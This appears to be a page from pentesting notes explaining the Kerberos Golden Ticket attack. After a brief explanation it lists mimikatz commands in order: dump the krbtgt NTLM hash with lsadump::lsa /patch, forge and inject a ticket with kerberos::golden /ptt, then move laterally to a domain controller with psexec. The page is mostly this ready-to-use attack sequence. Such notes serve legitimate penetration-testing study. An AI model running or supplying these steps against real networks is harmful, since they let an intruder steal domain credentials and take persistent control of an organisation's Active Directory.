Golden ticket attack

Golden Ticket attack

Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, or golden tickets

  1. mimikatz.exe

  2. privilege::debug

  3. lsadump::lsa /patch to get krbtgt ntlm hash

  4. kerberos::purge

  5. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt

  6. misc::cmd

  7. psexec.exe \\<dc_machine> cmd.exe With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec

  8. whoami

  9. whoami /group for verification

PreviousPersistenceNextDomain Controller synchronization-Dumping all hashes

Last updated